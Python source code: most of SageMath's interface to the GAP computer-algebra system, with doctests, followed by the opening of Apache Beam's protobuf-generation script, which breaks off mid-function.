sage: gap._eval_using_file_cutoff = 4
sage: gap._eval_line('while(1=1) do i:=1;; od;', wait_for_prompt=False)
''
sage: rc = gap.interrupt(timeout=1)
sage: gap._eval_using_file_cutoff = cutoff
The following tests against a bug fixed at :trac:`10296`::
sage: gap(3)
3
sage: gap.eval('quit;')
''
sage: a = gap(3)
** Gap crashed or quit executing '\$sage...:=3;;' **
Restarting Gap and trying again
sage: a
3
"""
expect_eof = self._quit_string() in line
try:
if self._expect is None:
self._start()
if allow_use_file and wait_for_prompt and len(line) > self._eval_using_file_cutoff:
return self._eval_line_using_file(line)
(normal, error) = self._execute_line(line, wait_for_prompt=wait_for_prompt,
expect_eof=expect_eof)
# The internal method _execute_line returns bytes but the bytes it
# returns should contain text (any terminal commands and other
# garbage should be filtered out by this point); here we decode
# them (on Python 3), currently just using the default encoding
normal, error = bytes_to_str(normal), bytes_to_str(error)
if len(error):
if 'Error, Rebuild completion files!' in error:
error += "\nRunning gap_reset_workspace()..."
self.quit()
gap_reset_workspace()
error = error.replace('\r','')
raise RuntimeError("%s produced error output\n%s\n executing %s"%(self, error,line))
if not len(normal):
return ''
if isinstance(wait_for_prompt, str) and normal.ends_with(wait_for_prompt):
n = len(wait_for_prompt)
elif normal.endswith(bytes_to_str(self._prompt)):
n = len(self._prompt)
elif normal.endswith(self._continuation_prompt()):
n = len(self._continuation_prompt())
else:
n = 0
out = normal[:-n]
if len(out) and out[-1] == "\n":
out = out[:-1]
return out
except (RuntimeError, TypeError, pexpect.ExceptionPexpect) as exc:
if not self._isalive():
# We can't distinguish just EOF from an unexpectedly killed
# process because pexpect catches EOF's and re-reraises them
# But if we *were* expecting EOF then we should just let it
# fail silently and return
if expect_eof:
return ''
print("** %s crashed or quit executing '%s' **" % (self, line))
print("Restarting %s and trying again" % self)
self._start()
if line != '':
return self._eval_line(line, allow_use_file=allow_use_file)
else:
return ''
else:
raise RuntimeError(exc)
except KeyboardInterrupt:
self._keyboard_interrupt()
raise KeyboardInterrupt("Ctrl-c pressed while running %s"%self)
def unbind(self, var):
"""
Clear the variable named var.
EXAMPLES::
sage: gap.set('x', '2')
sage: gap.get('x')
'2'
sage: gap.unbind('x')
sage: gap.get('x')
Traceback (most recent call last):
...
RuntimeError: Gap produced error output
Error, Variable: 'x' must have a value
...
"""
self.eval('Unbind(%s)'%var)
self.clear(var)
def _contains(self, v1, v2):
"""
EXAMPLES::
sage: Integers = gap('Integers')
sage: two = gap(2)
sage: gap._contains(two.name(), Integers.name())
True
::
sage: 2 in gap('Integers')
True
"""
return self.eval('%s in %s'%(v1,v2)) == "true"
def _true_symbol(self):
"""
Returns the symbol for truth in GAP.
EXAMPLES::
sage: gap._true_symbol()
'true'
sage: gap(2) == gap(2)
True
"""
return "true"
def _false_symbol(self):
"""
Returns the symbol for falsity in GAP.
EXAMPLES::
sage: gap._false_symbol()
'false'
sage: gap(2) == gap(3)
False
"""
return "false"
def _equality_symbol(self):
"""
Returns the symbol for equality in GAP.
EXAMPLES::
sage: gap._equality_symbol()
'='
sage: gap(2) == gap(3)
False
sage: gap(2) == gap(2)
True
"""
return "="
def version(self):
"""
Returns the version of GAP being used.
EXAMPLES::
sage: print(gap.version())
4...
"""
return self.eval('GAPInfo.Version')[1:-1]
def function_call(self, function, args=None, kwds=None):
"""
Calls the GAP function with args and kwds.
EXAMPLES::
sage: gap.function_call('SymmetricGroup', [5])
SymmetricGroup( [ 1 .. 5 ] )
If the GAP function does not return a value, but prints something
to the screen, then a string of the printed output is returned.
::
sage: s = gap.function_call('Display', [gap.SymmetricGroup(5).CharacterTable()])
sage: type(s)
<class 'sage.interfaces.interface.AsciiArtString'>
sage: s.startswith('CT')
True
TESTS:
If the function call is too long, two ``gap.eval`` calls are made
since returned values from commands in a file cannot be handled
properly::
sage: g = Gap()
sage: g.function_call("ConjugacyClassesSubgroups", sage.interfaces.gap.GapElement(g, 'SymmetricGroup(2)', name = 'a_variable_with_a_very_very_very_long_name')) # random
[ ConjugacyClassSubgroups(SymmetricGroup( [ 1 .. 2 ] ),Group( () )),
ConjugacyClassSubgroups(SymmetricGroup( [ 1 .. 2 ] ),Group( [ (1,2) ] )) ]
When the command itself is so long that it warrants use of a temporary
file to be communicated to GAP, this does not cause problems since
the file will contain a single command::
sage: g.function_call("ConjugacyClassesSubgroups", sage.interfaces.gap.GapElement(g, 'SymmetricGroup(2)', name = 'a_variable_with_a_name_so_very_very_very_long_that_even_by_itself_will_make_expect_use_a_file')) # random
[ ConjugacyClassSubgroups(SymmetricGroup( [ 1 .. 2 ] ),Group( () )),
ConjugacyClassSubgroups(SymmetricGroup( [ 1 .. 2 ] ),Group( [ (1,2) ] )) ]
"""
args, kwds = self._convert_args_kwds(args, kwds)
self._check_valid_function_name(function)
#Here we have to do some magic because not all GAP
#functions return a value. If you try to store their
#results to a variable, then GAP will complain. Thus, before
#we evaluate the function, we make it so that the marker string
#is in the 'last' variable in GAP. If the function returns a
#value, then that value will be in 'last', otherwise it will
#be the marker.
marker = '__SAGE_LAST__:="__SAGE_LAST__";;'
cmd = "%s(%s);;"%(function, ",".join([s.name() for s in args]+
['%s=%s'%(key,value.name()) for key, value in kwds.items()]))
if len(marker) + len(cmd) <= self._eval_using_file_cutoff:
# We combine the two commands so we only run eval() once and the
# only output would be from the second command
res = self.eval(marker+cmd)
else:
self.eval(marker)
res = self.eval(cmd)
if self.eval(self._identical_function + '(last,__SAGE_LAST__)') != 'true':
return self.new('last2;')
else:
if res.strip():
from sage.interfaces.interface import AsciiArtString
return AsciiArtString(res)
def get_record_element(self, record, name):
r"""
Return the element of a GAP record identified by ``name``.
INPUT:
- ``record`` -- a GAP record
- ``name`` -- str
OUTPUT:
- :class:`GapElement`
EXAMPLES::
sage: rec = gap('rec( a := 1, b := "2" )')
sage: gap.get_record_element(rec, 'a')
1
sage: gap.get_record_element(rec, 'b')
2
TESTS::
sage: rec = gap('rec( a := 1, b := "2" )')
sage: type(gap.get_record_element(rec, 'a'))
<class 'sage.interfaces.gap.GapElement'>
"""
return self('%s.%s' % (record.name(), name))
# We need to inherit from ModuleElement to support
# sage.structure.coerce_actions.ModuleAction and it needs to be first
# in the MRO because extension types should always come first.
@instancedoc
class GapElement_generic(ModuleElement, ExtraTabCompletion, ExpectElement):
r"""
Generic interface to the GAP3/GAP4 interpreters.
AUTHORS:
- William Stein and David Joyner (interface for GAP4)
- Franco Saliola (Feb 2010): refactored to separate out the generic
code
"""
def _add_(self, other):
"""
EXAMPLES::
sage: a = gap(1)
sage: a + a
2
"""
# This is just a copy of ExpectElement._add_ to fix the fact
# that the abtract method ModuleElement._add_ comes first in
# the MRO.
return self._operation("+", other)
def __bool__(self):
"""
EXAMPLES::
sage: bool(gap(2))
True
sage: gap(0).bool()
False
sage: gap('false').bool()
False
"""
P = self._check_valid()
return self != P(0) and repr(self) != 'false'
__nonzero__ = __bool__
def __len__(self):
"""
EXAMPLES::
sage: v = gap('[1,2,3]'); v
[ 1, 2, 3 ]
sage: len(v)
3
len is also called implicitly by if::
sage: if gap('1+1 = 2'):
....: print("1 plus 1 does equal 2")
1 plus 1 does equal 2
::
sage: if gap('1+1 = 3'):
....: print("it is true")
....: else:
....: print("it is false")
it is false
"""
P = self.parent()
if P.eval('%s = true'%self.name()) == 'true':
return 1
elif P.eval('%s = false'%self.name()) == 'true':
return 0
else:
return int(self.Length())
def is_string(self):
"""
Tell whether this element is a string.
EXAMPLES::
sage: gap('"abc"').is_string()
True
sage: gap('[1,2,3]').is_string()
False
"""
return bool(self.IsString())
def _matrix_(self, R):
r"""
Return matrix over the (Sage) ring R determined by self, where self
should be a Gap matrix.
EXAMPLES::
sage: s = gap("(Z(7)^0)*[[1,2,3],[4,5,6]]"); s
[ [ Z(7)^0, Z(7)^2, Z(7) ], [ Z(7)^4, Z(7)^5, Z(7)^3 ] ]
sage: s._matrix_(GF(7))
[1 2 3]
[4 5 6]
::
sage: s = gap("[[1,2], [3/4, 5/6]]"); s
[ [ 1, 2 ], [ 3/4, 5/6 ] ]
sage: m = s._matrix_(QQ); m
[ 1 2]
[3/4 5/6]
sage: parent(m)
Full MatrixSpace of 2 by 2 dense matrices over Rational Field
::
sage: s = gap('[[Z(16),Z(16)^2],[Z(16)^3,Z(16)]]')
sage: s._matrix_(GF(16,'a'))
[ a a^2]
[a^3 a]
"""
v = self.DimensionsMat()
n = int(v[1])
m = int(v[2])
from sage.matrix.matrix_space import MatrixSpace
M = MatrixSpace(R, n, m)
entries = [[R(self[r,c]) for c in range(1,m+1)] for r in range(1,n+1)]
return M(entries)
############
class Gap(Gap_generic):
r"""
Interface to the GAP interpreter.
AUTHORS:
- William Stein and David Joyner
"""
def __init__(self, max_workspace_size=None,
maxread=None, script_subdirectory=None,
use_workspace_cache=True,
server=None,
server_tmpdir=None,
logfile=None,
seed=None,
env={}):
"""
EXAMPLES::
sage: gap == loads(dumps(gap))
True
"""
self.__use_workspace_cache = use_workspace_cache
cmd, self.__make_workspace = gap_command(use_workspace_cache, server is None)
# -b: suppress banner
# -p: enable "package output mode"; this confusingly named option
# causes GAP to output special control characters that are normally
# intended for communication with a window manager (i.e. for xgap)
# but that we also use to control GAP with pexepect
# -T: disable interactive break loop when encountering errors
# -E: disable readline support
cmd += " -b -p -T -E"
if max_workspace_size is None:
max_workspace_size = _get_gap_memory_pool_size_MB()
cmd += ' -o ' + str(max_workspace_size)
cmd += ' -s ' + str(max_workspace_size)
cmd += ' -m 64m ' # attempt at a workaround for http://tracker.gap-system.org/issues/224
cmd += ' ' + os.path.join(SAGE_EXTCODE, 'gap', 'sage.g')
Expect.__init__(self,
name='gap',
prompt='gap> ',
command=cmd,
maxread=maxread,
server=server,
server_tmpdir=server_tmpdir,
script_subdirectory=script_subdirectory,
restart_on_ctrlc=True,
verbose_start=False,
logfile=logfile,
eval_using_file_cutoff=100,
env=env)
self.__seq = 0
self._seed = seed
def set_seed(self,seed=None):
"""
Set the seed for gap interpreter.
The seed should be an integer.
EXAMPLES::
sage: g = Gap()
sage: g.set_seed(0)
0
sage: [g.Random(1,10) for i in range(5)]
[2, 3, 3, 4, 2]
"""
if seed is None:
seed = self.rand_seed()
self.eval("Reset(GlobalMersenneTwister,%d);;" % seed)
self.eval("Reset(GlobalRandomSource,%d);;" % seed)
self._seed = seed
return seed
def __reduce__(self):
"""
EXAMPLES::
sage: gap.__reduce__()
(<function reduce_load_GAP at 0x...>, ())
sage: f, args = _
sage: f(*args)
Gap
"""
return reduce_load_GAP, tuple([])
def _next_var_name(self):
r"""
Returns the next unused variable name.
Note that names starting with dollar signs are valid GAP
identifiers, but need to be escaped with a backslash starting
with GAP-4.8.
EXAMPLES::
sage: g = Gap()
sage: g._next_var_name()
'\\$sage1'
sage: g(2)^2
4
sage: g._next_var_name()
'\\$sage...'
"""
if len(self._available_vars) != 0:
v = self._available_vars[0]
del self._available_vars[0]
return v
self.__seq += 1
return r'\$sage%s'%self.__seq
def _start(self):
"""
EXAMPLES::
sage: g = Gap()
sage: g.is_running()
False
sage: g._start()
sage: g.is_running()
True
sage: g.quit()
"""
if self.__use_workspace_cache:
from sage.libs.gap.saved_workspace import timestamp
try:
# Check to see if we need to auto-regenerate the gap
# workspace, i.e., if the gap script is more recent
# than the saved workspace, which signals that gap has
# been upgraded.
if os.path.getmtime(WORKSPACE) < timestamp():
raise OSError("GAP workspace too old")
# Set the modification time of the workspace to the
# current time. This ensures the workspace doesn't
# get deleted too soon by gap_reset_workspace().
os.utime(WORKSPACE, None)
except OSError:
gap_reset_workspace(verbose=False)
global first_try
n = self._session_number
try:
Expect._start(self, "Failed to start GAP.")
except Exception:
if self.__use_workspace_cache and first_try:
first_try = False
self.quit()
gap_reset_workspace(verbose=False)
Expect._start(self, "Failed to start GAP.")
self._session_number = n
self.__make_workspace = False
else:
raise
if self.__use_workspace_cache and self.__make_workspace:
self.save_workspace()
# Now, as self._expect exists, we can compile some useful pattern:
self._compiled_full_pattern = self._expect.compile_pattern_list([
r'@p\d+\.','@@','@[A-Z]',r'@[123456!"#$%&][^+]*\+',
'@e','@c','@f','@h','@i','@m','@n','@r',r'@s\d',r'@w.*\+','@x','@z'])
# read everything up to the first "ready" prompt
self._expect.expect("@i")
# set random seed
self.set_seed(self._seed)
def _function_class(self):
"""
Returns the GapFunction class.
EXAMPLES::
sage: gap._function_class()
<class 'sage.interfaces.gap.GapFunction'>
::
sage: type(gap.Order)
<class 'sage.interfaces.gap.GapFunction'>
"""
return GapFunction
def cputime(self, t=None):
r"""
Returns the amount of CPU time that the GAP session has used. If
``t`` is not None, then it returns the difference
between the current CPU time and ``t``.
EXAMPLES::
sage: t = gap.cputime()
sage: t #random
0.13600000000000001
sage: gap.Order(gap.SymmetricGroup(5))
120
sage: gap.cputime(t) #random
0.059999999999999998
"""
if t is not None:
return self.cputime() - t
else:
self.eval('_r_ := Runtimes();')
r = sum(eval(self.eval('[_r_.user_time, _r_.system_time, _r_.user_time_children, _r_.system_time_children]')))
return r/1000.0
def save_workspace(self):
r"""
Save the GAP workspace.
TESTS:
We make sure that :trac:`9938` (GAP does not start if the path
to the GAP workspace file contains more than 82 characters) is
fixed::
sage: ORIGINAL_WORKSPACE = sage.interfaces.gap.WORKSPACE
sage: sage.interfaces.gap.WORKSPACE = os.path.join(SAGE_TMP, "gap" + "0"*(80-len(SAGE_TMP)))
sage: gap = Gap()
sage: gap('3+2') # long time (4s on sage.math, 2013)
5
sage: sage.interfaces.gap.WORKSPACE = ORIGINAL_WORKSPACE
"""
prepare_workspace_dir()
# According to the GAP Reference Manual,
# [http://www.gap-system.org/Manuals/doc/htm/ref/CHAP003.htm#SSEC011.1]
# SaveWorkspace can only be used at the main gap> prompt. It cannot
# be included in the body of a loop or function, or called from a
# break loop.
from sage.misc.temporary_file import atomic_write
with atomic_write(WORKSPACE) as f:
f.close()
self.eval('SaveWorkspace("%s");'%(f.name), allow_use_file=False)
# Todo -- this -- but there is a tricky "when does it end" issue!
# Maybe do via a file somehow?
def help(self, s, pager=True):
"""
Print help on a given topic.
EXAMPLES:
Note: In order to ensure consistent unicode handling from GAP we
start a GAP instance with a forced UTF-8 locale::
sage: gap = Gap(env={'LC_CTYPE': 'en_US.UTF-8'})
sage: print(gap.help('SymmetricGroup', pager=False))
<BLANKLINE>
50.1-... SymmetricGroup
<BLANKLINE>
‣ SymmetricGroup( [filt, ]deg ) ─────────────────────────────────── function
...
<BLANKLINE>
"""
tmp_to_use = self._local_tmpfile()
if self.is_remote():
tmp_to_use = self._remote_tmpfile()
else:
tmp_to_use = self._local_tmpfile()
self.eval('SetGAPDocTextTheme("none")')
gap_encoding = str(self('GAPInfo.TermEncoding;'))
self.eval(r'\$SAGE.tempfile := "%s";' % tmp_to_use)
line = Expect.eval(self, "? %s" % s)
Expect.eval(self, "? 1")
match = re.search(r"Page from (\d+)", line)
if match is None:
print(line)
else:
(sline,) = match.groups()
sline = int(sline) - 1
if self.is_remote():
self._get_tmpfile()
with io.open(self._local_tmpfile(), "r",
encoding=gap_encoding) as fobj:
help = fobj.read()
if pager:
from IPython.core.page import page
page(help, start=sline)
else:
# Find the n-th line and return from there
idx = -1
while sline:
try:
idx = help.find('\n', idx + 1)
sline -= 1
except ValueError:
# We ran out of lines early somehow; this shouldn't
# happen though
break
return help[idx:]
def set(self, var, value):
"""
Set the variable var to the given value.
EXAMPLES::
sage: gap.set('x', '2')
sage: gap.get('x')
'2'
"""
cmd = ('%s:=%s;;' % (var, value)).replace('\n','')
self._eval_line(cmd, allow_use_file=True)
def get(self, var, use_file=False):
"""
Get the string representation of the variable var.
EXAMPLES::
sage: gap.set('x', '2')
sage: gap.get('x')
'2'
"""
if use_file:
tmp = self._local_tmpfile()
if os.path.exists(tmp):
os.unlink(tmp)
self.eval('PrintTo("%s", %s);'%(tmp,var), strip=False)
with open(tmp) as f:
r = f.read()
r = r.strip().replace("\\\n","")
os.unlink(tmp)
return r
else:
return self.eval('Print(%s);'%var, newlines=False)
def _pre_interact(self):
"""
EXAMPLES::
sage: gap._pre_interact()
sage: gap._post_interact()
"""
self._eval_line(r'\$SAGE.StartInteract();')
def _post_interact(self):
"""
EXAMPLES::
sage: gap._pre_interact()
sage: gap._post_interact()
"""
self._eval_line(r'\$SAGE.StopInteract();')
def _eval_line_using_file(self, line):
i = line.find(':=')
if i != -1:
j = line.find('"')
if j >= 0 and j < i:
i = -1
if i == -1:
line0 = 'Print( %s );'%line.rstrip().rstrip(';')
try: # this is necessary, since Print requires something as input, and some functions (e.g., Read) return nothing.
return Expect._eval_line_using_file(self, line0)
except RuntimeError:
return ''
return Expect._eval_line_using_file(self, line)
def console(self):
"""
Spawn a new GAP command-line session.
EXAMPLES::
sage: gap.console() # not tested
********* GAP, Version 4.5.7 of 14-Dec-2012 (free software, GPL)
* GAP * http://www.gap-system.org
********* Architecture: x86_64-unknown-linux-gnu-gcc-default64
Libs used: gmp, readline
Loading the library and packages ...
Packages: GAPDoc 1.5.1
Try '?help' for help. See also '?copyright' and '?authors'
gap>
"""
gap_console()
def _object_class(self):
"""
Returns the GapElement class.
EXAMPLES::
sage: gap._object_class()
<class 'sage.interfaces.gap.GapElement'>
sage: type(gap(2))
<class 'sage.interfaces.gap.GapElement'>
"""
return GapElement
def _function_element_class(self):
"""
Returns the GapFunctionElement class.
EXAMPLES::
sage: gap._function_element_class()
<class 'sage.interfaces.gap.GapFunctionElement'>
sage: type(gap.SymmetricGroup(4).Order)
<class 'sage.interfaces.gap.GapFunctionElement'>
"""
return GapFunctionElement
@cached_method
def _tab_completion(self):
"""
Return additional tab completion entries
OUTPUT:
List of strings
EXAMPLES::
sage: '{}' in gap._tab_completion()
False
sage: c = gap._tab_completion()
sage: len(c) > 100
True
sage: 'Order' in c
True
"""
names = eval(self.eval('NamesSystemGVars()')) + \
eval(self.eval('NamesUserGVars()'))
return [n for n in names if n[0] in string.ascii_letters]
############
def gap_reset_workspace(max_workspace_size=None, verbose=False):
r"""
Call this to completely reset the GAP workspace, which is used by
default when Sage first starts GAP.
The first time you start GAP from Sage, it saves the startup state
of GAP in a file ``$HOME/.sage/gap/workspace-gap-HASH``, where ``HASH``
is a hash of the directory where Sage is installed.
This is useful, since then subsequent startup of GAP is at least 10
times as fast. Unfortunately, if you install any new code for GAP,
it won't be noticed unless you explicitly load it, e.g., with
gap.load_package("my_package")
The packages sonata, guava, factint, gapdoc, grape, design, toric,
and laguna are loaded in all cases before the workspace is saved,
if they are available.
TESTS:
Check that the race condition from :trac:`14242` has been fixed.
We temporarily need to change the worksheet filename. ::
sage: ORIGINAL_WORKSPACE = sage.interfaces.gap.WORKSPACE
sage: sage.interfaces.gap.WORKSPACE = tmp_filename()
sage: from multiprocessing import Process
sage: import time
sage: gap = Gap() # long time (reset GAP session)
sage: P = [Process(target=gap, args=("14242",)) for i in range(4)]
sage: for p in P: # long time, indirect doctest
....: p.start()
....: time.sleep(float(0.2))
sage: for p in P: # long time
....: p.join()
sage: os.unlink(sage.interfaces.gap.WORKSPACE) # long time
sage: sage.interfaces.gap.WORKSPACE = ORIGINAL_WORKSPACE
"""
# Create new workspace with filename WORKSPACE
g = Gap(use_workspace_cache=False, max_workspace_size=None)
g.eval('SetUserPreference("HistoryMaxLines", 30)')
from sage.tests.gap_packages import all_installed_packages
for pkg in all_installed_packages(gap=g):
try:
g.load_package(pkg, verbose=verbose)
except RuntimeError as msg:
if verbose:
print('*** %s' % msg)
# end for
g.save_workspace()
g.quit()
@instancedoc
class GapElement(GapElement_generic):
def __getitem__(self, n):
"""
EXAMPLES::
sage: a = gap([1,2,3])
sage: a[1]
1
"""
self._check_valid()
if not isinstance(n, tuple):
return self.parent().new('%s[%s]'%(self._name, n))
else:
return self.parent().new('%s%s'%(self._name, ''.join(['[%s]'%x for x in n])))
def str(self, use_file=False):
"""
EXAMPLES::
sage: print(gap(2))
2
"""
if use_file:
P = self._check_valid()
return P.get(self.name(), use_file=True)
else:
return repr(self)
def _latex_(self):
r"""
EXAMPLES::
sage: s = gap("[[1,2], [3/4, 5/6]]")
sage: latex(s)
\left(\begin{array}{rr} 1&2\\ 3/4&\frac{5}{6}\\ \end{array}\right)
"""
P = self._check_valid()
try:
s = P.eval('LaTeXObj(%s)'%self.name())
s = s.replace('\\\\','\\').replace('"','')
s = s.replace('%\\n',' ')
return s
except RuntimeError:
return str(self)
@cached_method
def _tab_completion(self):
"""
Return additional tab completion entries
OUTPUT:
List of strings
EXAMPLES::
sage: s5 = gap.SymmetricGroup(5)
sage: 'Centralizer' in s5._tab_completion()
True
"""
P = self.parent()
v = P.eval(r'\$SAGE.OperationsAdmittingFirstArgument(%s)'%self.name())
v = v.replace('Tester(','').replace('Setter(','').replace(')','').replace('\n', '')
v = v.split(',')
v = [ oper.split('"')[1] for oper in v ]
v = [ oper for oper in v if all(ch in string.ascii_letters for ch in oper) ]
return sorted(set(v))
@instancedoc
class GapFunctionElement(FunctionElement):
def _instancedoc_(self):
"""
EXAMPLES::
sage: gap = Gap(env={'LC_CTYPE': 'en_US.UTF-8'})
sage: print(gap(4).SymmetricGroup.__doc__)
<BLANKLINE>
50.1-... SymmetricGroup
<BLANKLINE>
‣ SymmetricGroup( [filt, ]deg ) ─────────────────────────────────── function
...
"""
M = self._obj.parent()
help = M.help(self._name, pager=False)
return help
@instancedoc
class GapFunction(ExpectFunction):
def _instancedoc_(self):
"""
EXAMPLES::
sage: gap = Gap(env={'LC_CTYPE': 'en_US.UTF-8'})
sage: print(gap.SymmetricGroup.__doc__)
<BLANKLINE>
50.1-... SymmetricGroup
<BLANKLINE>
‣ SymmetricGroup( [filt, ]deg ) ─────────────────────────────────── function
...
"""
M = self._parent
help = M.help(self._name, pager=False)
return help
def is_GapElement(x):
"""
Returns True if x is a GapElement.
EXAMPLES::
sage: from sage.interfaces.gap import is_GapElement
sage: is_GapElement(gap(2))
True
sage: is_GapElement(2)
False
"""
return isinstance(x, GapElement)
def gfq_gap_to_sage(x, F):
"""
INPUT:
- ``x`` -- GAP finite field element
- ``F`` -- Sage finite field
OUTPUT: element of ``F``
EXAMPLES::
sage: x = gap('Z(13)')
sage: F = GF(13, 'a')
sage: F(x)
2
sage: F(gap('0*Z(13)'))
0
sage: F = GF(13^2, 'a')
sage: x = gap('Z(13)')
sage: F(x)
2
sage: x = gap('Z(13^2)^3')
sage: F(x)
12*a + 11
sage: F.multiplicative_generator()^3
12*a + 11
TESTS:
Check that :trac:`18048` is fixed::
sage: K.<a> = GF(16)
sage: b = a^2 + a
sage: K(b._gap_())
a^2 + a
AUTHOR:
- David Joyner and William Stein
"""
s = str(x)
if s[:2] == '0*':
return F(0)
i1 = s.index("(")
i2 = s.index(")")
q = eval(s[i1+1:i2].replace('^','**'))
if not F.cardinality().is_power_of(q):
raise ValueError('%r has no subfield of size %r' % (F, q))
if s.find(')^') == -1:
e = 1
else:
e = int(s[i2+2:])
if F.degree() == 1:
g = F(gap.eval('Int(Z(%s))' % q))
elif F.is_conway():
f = (F.cardinality() - 1) // (q - 1)
g = F.multiplicative_generator() ** f
else:
raise ValueError('%r is not prime or defined by a Conway polynomial' % F)
return g**e
def intmod_gap_to_sage(x):
r"""
INPUT:
- x -- Gap integer mod ring element
EXAMPLES::
sage: a = gap(Mod(3, 18)); a
ZmodnZObj( 3, 18 )
sage: b = sage.interfaces.gap.intmod_gap_to_sage(a); b
3
sage: b.parent()
Ring of integers modulo 18
sage: a = gap(Mod(3, 17)); a
Z(17)
sage: b = sage.interfaces.gap.intmod_gap_to_sage(a); b
3
sage: b.parent()
Finite Field of size 17
sage: a = gap(Mod(0, 17)); a
0*Z(17)
sage: b = sage.interfaces.gap.intmod_gap_to_sage(a); b
0
sage: b.parent()
Finite Field of size 17
sage: a = gap(Mod(3, 65537)); a
ZmodpZObj( 3, 65537 )
sage: b = sage.interfaces.gap.intmod_gap_to_sage(a); b
3
sage: b.parent()
Ring of integers modulo 65537
"""
from sage.rings.finite_rings.all import FiniteField
from sage.rings.finite_rings.integer_mod import Mod
from sage.rings.integer import Integer
s = str(x)
m = re.search(r'Z\(([0-9]*)\)', s)
if m:
return gfq_gap_to_sage(x, FiniteField(Integer(m.group(1))))
m = re.match(r'Zmod[np]ZObj\( ([0-9]*), ([0-9]*) \)', s)
if m:
return Mod(Integer(m.group(1)), Integer(m.group(2)))
raise ValueError("Unable to convert Gap element '%s'" % s)
#############
gap = Gap()
def reduce_load_GAP():
"""
Returns the GAP interface object defined in sage.interfaces.gap.
EXAMPLES::
sage: from sage.interfaces.gap import reduce_load_GAP
sage: reduce_load_GAP()
Gap
"""
return gap
def gap_console():
"""
Spawn a new GAP command-line session.
Note that in gap-4.5.7 you cannot use a workspace cache that had
no commandline to restore a gap session with commandline.
EXAMPLES::
sage: gap_console() # not tested
********* GAP, Version 4.5.7 of 14-Dec-2012 (free software, GPL)
* GAP * http://www.gap-system.org
********* Architecture: x86_64-unknown-linux-gnu-gcc-default64
Libs used: gmp, readline
Loading the library and packages ...
Packages: GAPDoc 1.5.1
Try '?help' for help. See also '?copyright' and '?authors'
gap>
TESTS::
sage: import subprocess as sp
sage: from sage.interfaces.gap import gap_command
sage: cmd = 'echo "quit;" | ' + gap_command(use_workspace_cache=False)[0]
sage: gap_startup = sp.check_output(cmd, shell=True, # py2
....: stderr=sp.STDOUT)
sage: gap_startup = sp.check_output(cmd, shell=True, # py3
....: stderr=sp.STDOUT,
....: encoding='latin1')
sage: 'www.gap-system.org' in gap_startup
True
sage: 'Error' not in gap_startup
True
sage: 'sorry' not in gap_startup
True
"""
from sage.repl.rich_output.display_manager import get_display_manager
if not get_display_manager().is_in_terminal():
raise RuntimeError('Can use the console only in the terminal. Try %%gap magics instead.')
cmd, _ = gap_command(use_workspace_cache=False)
cmd += ' ' + os.path.join(SAGE_EXTCODE,'gap','console.g')
os.system(cmd)
|
gen_protos.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Generates Python proto modules and grpc stubs for Beam protos."""
from __future__ import absolute_import
import glob
import logging
import multiprocessing
import os
import platform
import shutil
import subprocess
import sys
import time
import warnings
import pkg_resources
GRPC_TOOLS = 'grpcio-tools>=1.3.5,<2'
BEAM_PROTO_PATHS = [
os.path.join('..', '..', 'model', 'pipeline', 'src', 'main', 'proto'),
os.path.join('..', '..', 'model', 'job-management', 'src', 'main', 'proto'),
os.path.join('..', '..', 'model', 'fn-execution', 'src', 'main', 'proto'),
]
PYTHON_OUTPUT_PATH = os.path.join('apache_beam', 'portability', 'api')
def generate_proto_files(force=False):
try:
import grpc_tools # pylint: disable=unused-variable
except ImportError:
warnings.warn('Installing grpcio-tools is recommended for development.')
py_sdk_root = os.path.dirname(os.path.abspath(__file__))
common = os.path.join(py_sdk_root, '..', 'common')
proto_dirs = [os.path.join(py_sdk_root, path) for path in BEAM_PROTO_PATHS]
proto_files = sum(
[glob.glob(os.path.join(d, '*.proto')) for d in proto_dirs], [])
out_dir = os.path.join(py_sdk_root, PYTHON_OUTPUT_PATH)
out_files = [path for path in glob.glob(os.path.join(out_dir, '*_pb2.py'))]
if out_files and not proto_files and not force:
# We have out_files but no protos; assume they're up to date.
# This is actually the common case (e.g. installation from an sdist).
logging.info('No proto files; using existing generated files.')
return
elif not out_files and not proto_files:
if not os.path.exists(common):
raise RuntimeError(
'Not in apache git tree; unable to find proto definitions.')
else:
raise RuntimeError(
'No proto files found in %s.' % proto_dirs)
# Regenerate iff the proto files are newer.
elif force or not out_files or len(out_files) < len(proto_files) or (
min(os.path.getmtime(path) for path in out_files)
<= max(os.path.getmtime(path) for path in proto_files)):
try:
from grpc_tools import protoc
except ImportError:
if platform.system() == 'Windows':
# For Windows, grpcio-tools has to be installed manually.
raise RuntimeError(
'Cannot generate protos for Windows since grpcio-tools package is '
'not installed. Please install this package manually '
'using \'pip install grpcio-tools\'.')
# Use a subprocess to avoid messing with this process' path and imports.
# Note that this requires a separate module from setup.py for Windows:
# https://docs.python.org/2/library/multiprocessing.html#windows
p = multiprocessing.Process(
target=_install_grpcio_tools_and_generate_proto_files)
p.start()
p.join()
if p.exitcode:
raise ValueError("Proto generation failed (see log for details).")
else:
logging.info('Regenerating out-of-date Python proto definitions.')
builtin_protos = pkg_resources.resource_filename('grpc_tools', '_proto')
args = (
[sys.executable] + # expecting to be called from command line
['--proto_path=%s' % builtin_protos] +
['--proto_path=%s' % d for d in proto_dirs] +
['--python_out=%s' % out_dir] +
# TODO(robertwb): Remove the prefix once it's the default.
['--grpc_python_out=grpc_2_0:%s' % out_dir] +
proto_files)
ret_code = protoc.main(args)
if ret_code:
raise RuntimeError(
'Protoc returned non-zero status (see logs for details): '
'%s' % ret_code)
if sys.version_info[0] >= 3:
ret_code = subprocess.call(
["futurize", "--both-stages", "--write", "--verbose", "--no-diff",
out_dir])
if ret_code:
raise RuntimeError(
'Error applying futurize to generated protobuf python files.')
# Though wheels are available for grpcio-tools, setup_requires uses
# easy_install which doesn't understand them. This means that it is
# compiled from scratch (which is expensive as it compiles the full
# protoc compiler). Instead, we attempt to install a wheel in a temporary
# directory and add it to the path as needed.
# See https://github.com/pypa/setuptools/issues/377
def _install_grpcio_tools_and_generate_proto_files():
install_path = os.path.join(
os.path.dirname(os.path.abspath(__file__)), '.eggs', 'grpcio-wheels')
